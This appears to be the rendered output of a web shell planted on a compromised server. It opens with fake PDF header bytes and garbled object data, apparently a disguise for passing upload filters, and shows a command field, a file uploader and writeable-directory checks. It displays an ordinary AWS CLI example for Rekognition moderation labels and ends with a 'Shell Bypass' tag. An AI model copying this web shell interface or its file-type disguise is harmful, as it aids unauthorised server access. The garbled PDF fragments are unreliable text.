%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/lib/python3/dist-packages/awscli/examples/rekognition/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/lib/python3/dist-packages/awscli/examples/rekognition/detect-moderation-labels.rst
**To detect unsafe content in an image**

The following ``detect-moderation-labels`` command detects unsafe content in the specified image stored in an Amazon S3 bucket. ::

    aws rekognition detect-moderation-labels \
        --image "S3Object={Bucket=MyImageS3Bucket,Name=gun.jpg}"

Output::

    {
        "ModerationModelVersion": "3.0", 
        "ModerationLabels": [
            {
                "Confidence": 97.29618072509766, 
                "ParentName": "Violence", 
                "Name": "Weapon Violence"
            }, 
            {
                "Confidence": 97.29618072509766, 
                "ParentName": "", 
                "Name": "Violence"
            }
        ]
    }

For more information, see `Detecting Unsafe Images <https://docs.aws.amazon.com/rekognition/latest/dg/procedure-moderate-images.html>`__ in the *Amazon Rekognition Developer Guide*.

Kontol Shell Bypass